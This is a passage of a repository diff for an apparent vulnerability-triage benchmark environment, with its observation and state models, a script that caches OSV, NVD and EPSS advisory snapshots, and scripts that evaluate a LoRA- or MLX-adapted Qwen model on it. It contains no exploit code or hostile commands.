description="Evidence identifiers available to inspect next",
|
| 94 |
+
)
|
| 95 |
+
draft: TriageDraft = Field(
|
| 96 |
+
default_factory=TriageDraft,
|
| 97 |
+
description="Current structured triage draft",
|
| 98 |
+
)
|
| 99 |
+
action_history: List[str] = Field(
|
| 100 |
+
default_factory=list,
|
| 101 |
+
description="Compact history of recent agent actions",
|
| 102 |
+
)
|
| 103 |
+
steps_remaining: int = Field(..., ge=0, description="Remaining steps in the episode")
|
| 104 |
+
score_breakdown: Dict[str, float] = Field(
|
| 105 |
+
default_factory=dict,
|
| 106 |
+
description="Current normalized grader breakdown",
|
| 107 |
+
)
|
| 108 |
+
final_score: Optional[float] = Field(
|
| 109 |
+
default=None,
|
| 110 |
+
description="Final submission score when the episode is done",
|
| 111 |
+
)
|
| 112 |
+
available_actions: List[str] = Field(
|
| 113 |
+
default_factory=lambda: [
|
| 114 |
+
"read_report",
|
| 115 |
+
"inspect_evidence",
|
| 116 |
+
"search_nvd_database",
|
| 117 |
+
"fetch_commit_diff",
|
| 118 |
+
"message_maintainer",
|
| 119 |
+
"set_validity",
|
| 120 |
+
"set_affected_package",
|
| 121 |
+
"set_affected_versions",
|
| 122 |
+
"set_severity",
|
| 123 |
+
"set_exploitability",
|
| 124 |
+
"set_next_action",
|
| 125 |
+
"set_missing_information",
|
| 126 |
+
"request_more_info",
|
| 127 |
+
"submit_triage",
|
| 128 |
+
],
|
| 129 |
+
description="Action names the agent can choose from",
|
| 130 |
+
)
|
| 131 |
+
|
| 132 |
+
|
| 133 |
+
class VulnTriageState(State):
|
| 134 |
+
"""Serializable environment state for inspection and debugging."""
|
| 135 |
+
|
| 136 |
+
task_id: str = Field(..., description="Current task identifier")
|
| 137 |
+
difficulty: str = Field(..., description="Difficulty band")
|
| 138 |
+
draft: TriageDraft = Field(default_factory=TriageDraft)
|
| 139 |
+
revealed_evidence_ids: List[str] = Field(default_factory=list)
|
| 140 |
+
action_history: List[str] = Field(default_factory=list)
|
| 141 |
+
steps_remaining: int = Field(..., ge=0)
|
| 142 |
+
submitted: bool = Field(default=False)
|
| 143 |
+
final_score: Optional[float] = Field(default=None)
|
| 144 |
+
score_breakdown: Dict[str, float] = Field(default_factory=dict)
|
openenv.yaml
ADDED
|
@@ -0,0 +1,6 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
spec_version: 1
|
| 2 |
+
name: vulnops
|
| 3 |
+
type: space
|
| 4 |
+
runtime: fastapi
|
| 5 |
+
app: server.app:app
|
| 6 |
+
port: 7860
|
pyproject.toml
ADDED
|
@@ -0,0 +1,29 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
[build-system]
|
| 2 |
+
requires = ["setuptools>=45", "wheel"]
|
| 3 |
+
build-backend = "setuptools.build_meta"
|
| 4 |
+
|
| 5 |
+
[project]
|
| 6 |
+
name = "openenv-vulnops"
|
| 7 |
+
version = "0.1.0"
|
| 8 |
+
description = "Deterministic OpenEnv benchmark for open-source vulnerability operations"
|
| 9 |
+
readme = "README.md"
|
| 10 |
+
requires-python = ">=3.10"
|
| 11 |
+
dependencies = [
|
| 12 |
+
"openenv-core[core]>=0.2.3",
|
| 13 |
+
]
|
| 14 |
+
|
| 15 |
+
[project.optional-dependencies]
|
| 16 |
+
dev = [
|
| 17 |
+
"pytest>=8.0.0",
|
| 18 |
+
]
|
| 19 |
+
train = [
|
| 20 |
+
"peft>=0.14.0",
|
| 21 |
+
]
|
| 22 |
+
|
| 23 |
+
[project.scripts]
|
| 24 |
+
server = "vulnops.server.app:main"
|
| 25 |
+
|
| 26 |
+
[tool.setuptools]
|
| 27 |
+
include-package-data = true
|
| 28 |
+
packages = ["vulnops", "vulnops.server"]
|
| 29 |
+
package-dir = { "vulnops" = ".", "vulnops.server" = "server" }
|
scripts/build_snapshot_cache.py
ADDED
|
@@ -0,0 +1,139 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""Build a provider-backed fallback snapshot cache."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import json
|
| 6 |
+
from pathlib import Path
|
| 7 |
+
import sys
|
| 8 |
+
from concurrent.futures import ThreadPoolExecutor, as_completed
|
| 9 |
+
from typing import Dict, List
|
| 10 |
+
|
| 11 |
+
import requests
|
| 12 |
+
|
| 13 |
+
ROOT = Path(__file__).resolve().parent.parent
|
| 14 |
+
if str(ROOT) not in sys.path:
|
| 15 |
+
sys.path.insert(0, str(ROOT))
|
| 16 |
+
|
| 17 |
+
from server.cases import EPSS_URL, NVD_CVE_URL, OSV_VULN_URL, _extract_cve_id
|
| 18 |
+
|
| 19 |
+
SNAPSHOT_DIR = ROOT / "data" / "snapshots"
|
| 20 |
+
INDEX_PATH = ROOT / "data" / "snapshot_index.json"
|
| 21 |
+
PYPA_TREE_URL = "https://api.github.com/repos/pypa/advisory-database/git/trees/main?recursive=1"
|
| 22 |
+
|
| 23 |
+
|
| 24 |
+
def get_candidate_ids(limit: int = 200) -> List[str]:
|
| 25 |
+
response = requests.get(PYPA_TREE_URL, timeout=30)
|
| 26 |
+
response.raise_for_status()
|
| 27 |
+
tree = response.json().get("tree", [])
|
| 28 |
+
ids = []
|
| 29 |
+
for item in tree:
|
| 30 |
+
path = item.get("path", "")
|
| 31 |
+
if not path.startswith("vulns/") or not path.endswith(".yaml"):
|
| 32 |
+
continue
|
| 33 |
+
ident = path.rsplit("/", 1)[-1][:-5]
|
| 34 |
+
if ident.startswith(("PYSEC-", "GHSA-")):
|
| 35 |
+
ids.append(ident)
|
| 36 |
+
return ids[: limit * 4]
|
| 37 |
+
|
| 38 |
+
|
| 39 |
+
def fetch_json(url: str, *, params: Dict[str, str] | None = None) -> Dict:
|
| 40 |
+
response = requests.get(url, params=params, timeout=20)
|
| 41 |
+
response.raise_for_status()
|
| 42 |
+
return response.json()
|
| 43 |
+
|
| 44 |
+
|
| 45 |
+
def build_snapshot(osv_id: str) -> Dict | None:
|
| 46 |
+
osv = fetch_json(OSV_VULN_URL.format(osv_id=osv_id))
|
| 47 |
+
if not osv.get("affected"):
|
| 48 |
+
return None
|
| 49 |
+
|
| 50 |
+
cve_id = _extract_cve_id(osv)
|
| 51 |
+
snapshot = {
|
| 52 |
+
"id": osv.get("id"),
|
| 53 |
+
"summary": osv.get("summary"),
|
| 54 |
+
"details": osv.get("details"),
|
| 55 |
+
"aliases": osv.get("aliases", []),
|
| 56 |
+
"references": osv.get("references", []),
|
| 57 |
+
"affected": osv.get("affected", []),
|
| 58 |
+
"severity": "MEDIUM",
|
| 59 |
+
"nvd_description": "",
|
| 60 |
+
"epss_score": 0.0,
|
| 61 |
+
"epss_percentile": 0.0,
|
| 62 |
+
}
|
| 63 |
+
|
| 64 |
+
if cve_id:
|
| 65 |
+
try:
|
| 66 |
+
nvd = fetch_json(NVD_CVE_URL, params={"cveId": cve_id})
|
| 67 |
+
vulnerability = (nvd.get("vulnerabilities") or [{}])[0].get("cve", {})
|
| 68 |
+
metrics = vulnerability.get("metrics", {})
|
| 69 |
+
severity = None
|
| 70 |
+
for key in ("cvssMetricV40", "cvssMetricV31", "cvssMetricV30", "cvssMetricV2"):
|
| 71 |
+
if key in metrics:
|
| 72 |
+
item = metrics[key][0]
|
| 73 |
+
severity = (
|
| 74 |
+
item.get("cvssData", {}).get("baseSeverity")
|
| 75 |
+
or item.get("baseSeverity")
|
| 76 |
+
)
|
| 77 |
+
if severity:
|
| 78 |
+
break
|
| 79 |
+
descriptions = vulnerability.get("descriptions", [])
|
| 80 |
+
snapshot["severity"] = severity or snapshot["severity"]
|
| 81 |
+
snapshot["nvd_description"] = next(
|
| 82 |
+
(
|
| 83 |
+
desc.get("value", "")
|
| 84 |
+
for desc in descriptions
|
| 85 |
+
if desc.get("lang") == "en"
|
| 86 |
+
),
|
| 87 |
+
descriptions[0].get("value", "") if descriptions else "",
|
| 88 |
+
)
|
| 89 |
+
except Exception:
|
| 90 |
+
pass
|
| 91 |
+
|
| 92 |
+
try:
|
| 93 |
+
epss = fetch_json(EPSS_URL, params={"cve": cve_id})
|
| 94 |
+
item = (epss.get("data") or [{}])[0]
|
| 95 |
+
snapshot["epss_score"] = float(item.get("epss", 0.0) or 0.0)
|
| 96 |
+
snapshot["epss_percentile"] = float(item.get("percentile", 0.0) or 0.0)
|
| 97 |
+
except Exception:
|
| 98 |
+
pass
|
| 99 |
+
|
| 100 |
+
return snapshot
|
| 101 |
+
|
| 102 |
+
|
| 103 |
+
def main(target_count: int = 200) -> None:
|
| 104 |
+
SNAPSHOT_DIR.mkdir(parents=True, exist_ok=True)
|
| 105 |
+
candidates = get_candidate_ids(target_count)[: max(target_count + 40, 240)]
|
| 106 |
+
saved = []
|
| 107 |
+
|
| 108 |
+
with ThreadPoolExecutor(max_workers=12) as executor:
|
| 109 |
+
futures = {executor.submit(build_snapshot, osv_id): osv_id for osv_id in candidates}
|
| 110 |
+
for future in as_completed(futures):
|
| 111 |
+
if len(saved) >= target_count:
|
| 112 |
+
executor.shutdown(wait=False, cancel_futures=True)
|
| 113 |
+
break
|
| 114 |
+
osv_id = futures[future]
|
| 115 |
+
try:
|
| 116 |
+
snapshot = future.result()
|
| 117 |
+
except Exception:
|
| 118 |
+
continue
|
| 119 |
+
if not snapshot:
|
| 120 |
+
continue
|
| 121 |
+
out_path = SNAPSHOT_DIR / f"{osv_id}.json"
|
| 122 |
+
out_path.write_text(json.dumps(snapshot, indent=2, sort_keys=True))
|
| 123 |
+
saved.append(
|
| 124 |
+
{
|
| 125 |
+
"osv_id": osv_id,
|
| 126 |
+
"file": str(out_path.relative_to(ROOT)),
|
| 127 |
+
"cve_id": _extract_cve_id(snapshot),
|
| 128 |
+
"package": (snapshot.get("affected") or [{}])[0].get("package", {}).get("name", ""),
|
| 129 |
+
}
|
| 130 |
+
)
|
| 131 |
+
|
| 132 |
+
INDEX_PATH.parent.mkdir(parents=True, exist_ok=True)
|
| 133 |
+
saved = sorted(saved, key=lambda item: item["osv_id"])
|
| 134 |
+
INDEX_PATH.write_text(json.dumps({"count": len(saved), "snapshots": saved}, indent=2))
|
| 135 |
+
print(f"Saved {len(saved)} snapshots to {SNAPSHOT_DIR}")
|
| 136 |
+
|
| 137 |
+
|
| 138 |
+
if __name__ == "__main__":
|
| 139 |
+
main()
|
scripts/compare_training_speeds.py
ADDED
|
@@ -0,0 +1,38 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""Compare saved PyTorch and MLX speed summaries."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import json
|
| 6 |
+
from pathlib import Path
|
| 7 |
+
|
| 8 |
+
|
| 9 |
+
ROOT = Path(__file__).resolve().parents[1]
|
| 10 |
+
PT_PATH = ROOT / "artifacts" / "lora_qwen3_4b" / "metrics" / "speed_baseline_pytorch.json"
|
| 11 |
+
MLX_PATH = ROOT / "artifacts" / "mlx_qwen3_4b" / "metrics" / "speed_mlx.json"
|
| 12 |
+
OUT_PATH = ROOT / "artifacts" / "speed_comparison.json"
|
| 13 |
+
|
| 14 |
+
|
| 15 |
+
def load(path: Path) -> dict:
|
| 16 |
+
return json.loads(path.read_text(encoding="utf-8"))
|
| 17 |
+
|
| 18 |
+
|
| 19 |
+
def main() -> None:
|
| 20 |
+
pt = load(PT_PATH)
|
| 21 |
+
mlx = load(MLX_PATH)
|
| 22 |
+
pt_s = pt.get("latest_seconds_per_step")
|
| 23 |
+
mlx_s = mlx.get("latest_seconds_per_step")
|
| 24 |
+
payload = {
|
| 25 |
+
"pytorch_mps_seconds_per_step": pt_s,
|
| 26 |
+
"mlx_seconds_per_step": mlx_s,
|
| 27 |
+
"speedup_factor_mlx_vs_pytorch": (pt_s / mlx_s) if pt_s and mlx_s else None,
|
| 28 |
+
"notes": [
|
| 29 |
+
"PyTorch baseline uses the existing PEFT/Transformers trainer on MPS.",
|
| 30 |
+
"MLX benchmark uses a lower-memory LoRA config: 8 layers and max_seq_length 1024.",
|
| 31 |
+
],
|
| 32 |
+
}
|
| 33 |
+
OUT_PATH.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
|
| 34 |
+
print(json.dumps(payload, indent=2, sort_keys=True))
|
| 35 |
+
|
| 36 |
+
|
| 37 |
+
if __name__ == "__main__":
|
| 38 |
+
main()
|
scripts/dump_mlx_generation.py
ADDED
|
@@ -0,0 +1,63 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""Dump a full raw generation from the MLX model for one vulnops observation."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import argparse
|
| 6 |
+
import json
|
| 7 |
+
import sys
|
| 8 |
+
from pathlib import Path
|
| 9 |
+
|
| 10 |
+
ROOT = Path(__file__).resolve().parents[1]
|
| 11 |
+
if str(ROOT) not in sys.path:
|
| 12 |
+
sys.path.insert(0, str(ROOT))
|
| 13 |
+
|
| 14 |
+
from mlx_lm import generate, load
|
| 15 |
+
from mlx_lm.sample_utils import make_sampler
|
| 16 |
+
|
| 17 |
+
from server.vuln_triage_env_environment import VulnTriageEnvironment
|
| 18 |
+
from training_utils import render_prompt
|
| 19 |
+
|
| 20 |
+
|
| 21 |
+
def main() -> None:
|
| 22 |
+
parser = argparse.ArgumentParser()
|
| 23 |
+
parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
|
| 24 |
+
parser.add_argument("--adapter-path", default="artifacts/mlx_qwen3_4b/adapters")
|
| 25 |
+
parser.add_argument("--task-id", default="task_easy_guarddog")
|
| 26 |
+
parser.add_argument("--max-tokens", type=int, default=2048)
|
| 27 |
+
parser.add_argument(
|
| 28 |
+
"--output-file",
|
| 29 |
+
default="artifacts/mlx_qwen3_4b/inspection/task_easy_guarddog_latest_raw_output.json",
|
| 30 |
+
)
|
| 31 |
+
args = parser.parse_args()
|
| 32 |
+
|
| 33 |
+
model, tokenizer = load(args.model, adapter_path=args.adapter_path)
|
| 34 |
+
env = VulnTriageEnvironment()
|
| 35 |
+
observation = env.reset(task_id=args.task_id).model_dump()
|
| 36 |
+
prompt = render_prompt(observation, "Return only the best next action in JSON.")
|
| 37 |
+
raw_output = generate(
|
| 38 |
+
model,
|
| 39 |
+
tokenizer,
|
| 40 |
+
prompt=prompt,
|
| 41 |
+
verbose=False,
|
| 42 |
+
max_tokens=args.max_tokens,
|
| 43 |
+
sampler=make_sampler(temp=0.0),
|
| 44 |
+
)
|
| 45 |
+
|
| 46 |
+
output_path = Path(args.output_file)
|
| 47 |
+
if not output_path.is_absolute():
|
| 48 |
+
output_path = (ROOT / output_path).resolve()
|
| 49 |
+
output_path.parent.mkdir(parents=True, exist_ok=True)
|
| 50 |
+
payload = {
|
| 51 |
+
"task_id": args.task_id,
|
| 52 |
+
"model": args.model,
|
| 53 |
+
"adapter_path": args.adapter_path,
|
| 54 |
+
"max_tokens": args.max_tokens,
|
| 55 |
+
"prompt": prompt,
|
| 56 |
+
"raw_output": raw_output,
|
| 57 |
+
}
|
| 58 |
+
output_path.write_text(json.dumps(payload, indent=2) + "\n", encoding="utf-8")
|
| 59 |
+
print(output_path)
|
| 60 |
+
|
| 61 |
+
|
| 62 |
+
if __name__ == "__main__":
|
| 63 |
+
main()
|
scripts/evaluate_lora.py
ADDED
|
@@ -0,0 +1,133 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""Evaluate a base or LoRA-adapted model on the local vulnops environment."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import argparse
|
| 6 |
+
import json
|
| 7 |
+
import sys
|
| 8 |
+
from pathlib import Path
|
| 9 |
+
from typing import Dict, List
|
| 10 |
+
|
| 11 |
+
import torch
|
| 12 |
+
from transformers import AutoModelForCausalLM, AutoTokenizer
|
| 13 |
+
|
| 14 |
+
ROOT = Path(__file__).resolve().parents[1]
|
| 15 |
+
if str(ROOT) not in sys.path:
|
| 16 |
+
sys.path.insert(0, str(ROOT))
|
| 17 |
+
|
| 18 |
+
from server.cases import TASK_ORDER
|
| 19 |
+
from training_utils import (
|
| 20 |
+
detect_device,
|
| 21 |
+
maybe_parse_action,
|
| 22 |
+
preferred_torch_dtype,
|
| 23 |
+
render_prompt,
|
| 24 |
+
set_default_env,
|
| 25 |
+
)
|
| 26 |
+
from models import VulnTriageAction
|
| 27 |
+
from server.vuln_triage_env_environment import VulnTriageEnvironment
|
| 28 |
+
|
| 29 |
+
|
| 30 |
+
def load_model(model_name: str, adapter_path: str | None, output_root: Path):
|
| 31 |
+
set_default_env(output_root)
|
| 32 |
+
device = detect_device()
|
| 33 |
+
torch_dtype = preferred_torch_dtype(device)
|
| 34 |
+
tokenizer = AutoTokenizer.from_pretrained(model_name, trust_remote_code=True)
|
| 35 |
+
if tokenizer.pad_token is None:
|
| 36 |
+
tokenizer.pad_token = tokenizer.eos_token
|
| 37 |
+
|
| 38 |
+
model = AutoModelForCausalLM.from_pretrained(
|
| 39 |
+
model_name,
|
| 40 |
+
torch_dtype=torch_dtype,
|
| 41 |
+
trust_remote_code=True,
|
| 42 |
+
low_cpu_mem_usage=True,
|
| 43 |
+
)
|
| 44 |
+
|
| 45 |
+
if adapter_path:
|
| 46 |
+
try:
|
| 47 |
+
from peft import PeftModel
|
| 48 |
+
except ImportError as exc:
|
| 49 |
+
raise RuntimeError("peft is required to evaluate a LoRA adapter.") from exc
|
| 50 |
+
model = PeftModel.from_pretrained(model, adapter_path)
|
| 51 |
+
|
| 52 |
+
if device in {"cuda", "mps"}:
|
| 53 |
+
model.to(device)
|
| 54 |
+
model.eval()
|
| 55 |
+
return model, tokenizer, device
|
| 56 |
+
|
| 57 |
+
|
| 58 |
+
@torch.inference_mode()
|
| 59 |
+
def next_action(model, tokenizer, device: str, observation: Dict[str, object]) -> Dict[str, object]:
|
| 60 |
+
prompt = render_prompt(
|
| 61 |
+
observation=observation,
|
| 62 |
+
prompt_variant="Return only the best next action in JSON.",
|
| 63 |
+
)
|
| 64 |
+
encoded = tokenizer(prompt, return_tensors="pt")
|
| 65 |
+
encoded = {key: value.to(device) for key, value in encoded.items()}
|
| 66 |
+
generated = model.generate(
|
| 67 |
+
**encoded,
|
| 68 |
+
max_new_tokens=192,
|
| 69 |
+
do_sample=False,
|
| 70 |
+
temperature=None,
|
| 71 |
+
pad_token_id=tokenizer.pad_token_id,
|
| 72 |
+
eos_token_id=tokenizer.eos_token_id,
|
| 73 |
+
)
|
| 74 |
+
prompt_length = encoded["input_ids"].shape[1]
|
| 75 |
+
output_text = tokenizer.decode(generated[0][prompt_length:], skip_special_tokens=True).strip()
|
| 76 |
+
payload = maybe_parse_action(output_text)
|
| 77 |
+
if payload is None:
|
| 78 |
+
return {
|
| 79 |
+
"action_type": "submit_triage",
|
| 80 |
+
"rationale": f"Fallback because model output could not be parsed: {output_text[:120]}",
|
| 81 |
+
}
|
| 82 |
+
return payload
|
| 83 |
+
|
| 84 |
+
|
| 85 |
+
def run_episode(model, tokenizer, device: str, task_id: str) -> Dict[str, object]:
|
| 86 |
+
env = VulnTriageEnvironment()
|
| 87 |
+
observation = env.reset(task_id=task_id).model_dump()
|
| 88 |
+
actions: List[Dict[str, object]] = []
|
| 89 |
+
while not observation["done"]:
|
| 90 |
+
action_payload = next_action(model, tokenizer, device, observation)
|
| 91 |
+
action = VulnTriageAction.model_validate(action_payload)
|
| 92 |
+
actions.append(action.model_dump(exclude_none=True))
|
| 93 |
+
observation = env.step(action).model_dump()
|
| 94 |
+
return {
|
| 95 |
+
"task_id": task_id,
|
| 96 |
+
"difficulty": observation["difficulty"],
|
| 97 |
+
"final_score": float(observation.get("final_score") or 0.0),
|
| 98 |
+
"score_breakdown": observation["score_breakdown"],
|
| 99 |
+
"steps_used": len(actions),
|
| 100 |
+
"actions": actions,
|
| 101 |
+
}
|
| 102 |
+
|
| 103 |
+
|
| 104 |
+
def main() -> None:
|
| 105 |
+
parser = argparse.ArgumentParser()
|
| 106 |
+
parser.add_argument("--model", default="Qwen/Qwen3.5-4B")
|
| 107 |
+
parser.add_argument("--adapter-path")
|
| 108 |
+
parser.add_argument("--output-root", default="artifacts/lora_qwen3_4b")
|
| 109 |
+
parser.add_argument("--output-json")
|
| 110 |
+
args = parser.parse_args()
|
| 111 |
+
|
| 112 |
+
output_root = (ROOT / args.output_root).resolve()
|
| 113 |
+
model, tokenizer, device = load_model(args.model, args.adapter_path, output_root)
|
| 114 |
+
episodes = [run_episode(model, tokenizer, device, task_id) for task_id in TASK_ORDER]
|
| 115 |
+
average_score = round(sum(item["final_score"] for item in episodes) / len(episodes), 4)
|
| 116 |
+
payload = {
|
| 117 |
+
"model": args.model,
|
| 118 |
+
"adapter_path": args.adapter_path,
|
| 119 |
+
"device": device,
|
| 120 |
+
"average_score": average_score,
|
| 121 |
+
"episodes": episodes,
|
| 122 |
+
}
|
| 123 |
+
if args.output_json:
|
| 124 |
+
output_path = Path(args.output_json)
|
| 125 |
+
if not output_path.is_absolute():
|
| 126 |
+
output_path = (ROOT / output_path).resolve()
|
| 127 |
+
output_path.parent.mkdir(parents=True, exist_ok=True)
|
| 128 |
+
output_path.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
|
| 129 |
+
print(json.dumps(payload, indent=2, sort_keys=True))
|
| 130 |
+
|
| 131 |
+
|
| 132 |
+
if __name__ == "__main__":
|
| 133 |
+
main()
|
scripts/evaluate_mlx.py
ADDED
|
@@ -0,0 +1,137 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""Evaluate base or MLX-adapted Qwen models on the local vulnops environment."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import argparse
|
| 6 |
+
import json
|
| 7 |
+
import re
|
| 8 |
+
import sys
|
| 9 |
+
from pathlib import Path
|
| 10 |
+
from typing import Dict, List
|
| 11 |
+
|
| 12 |
+
ROOT = Path(__file__).resolve().parents[1]
|
| 13 |
+
if str(ROOT) not in sys.path:
|
| 14 |
+
sys.path.insert(0, str(ROOT))
|
| 15 |
+
|
| 16 |
+
from mlx_lm import generate, load
|
| 17 |
+
from mlx_lm.sample_utils import make_sampler
|
| 18 |
+
|
| 19 |
+
from models import VulnTriageAction
|
| 20 |
+
from server.cases import TASK_ORDER
|
| 21 |
+
from server.vuln_triage_env_environment import VulnTriageEnvironment
|
| 22 |
+
from training_utils import render_prompt
|
| 23 |
+
|
| 24 |
+
|
| 25 |
+
THINK_BLOCK_RE = re.compile(r"<think>.*?</think>", re.DOTALL | re.IGNORECASE)
|
| 26 |
+
|
| 27 |
+
|
| 28 |
+
def extract_last_json_object(text: str) -> str | None:
|
| 29 |
+
cleaned = THINK_BLOCK_RE.sub("", text).strip()
|
| 30 |
+
start = cleaned.find("{")
|
| 31 |
+
if start == -1:
|
| 32 |
+
return None
|
| 33 |
+
depth = 0
|
| 34 |
+
in_string = False
|
| 35 |
+
escape = False
|
| 36 |
+
last_candidate = None
|
| 37 |
+
candidate_start = None
|
| 38 |
+
for index, ch in enumerate(cleaned):
|
| 39 |
+
if ch == "\\" and in_string and not escape:
|
| 40 |
+
escape = True
|
| 41 |
+
continue
|
| 42 |
+
if ch == '"' and not escape:
|
| 43 |
+
in_string = not in_string
|
| 44 |
+
escape = False
|
| 45 |
+
if in_string:
|
| 46 |
+
continue
|
| 47 |
+
if ch == "{":
|
| 48 |
+
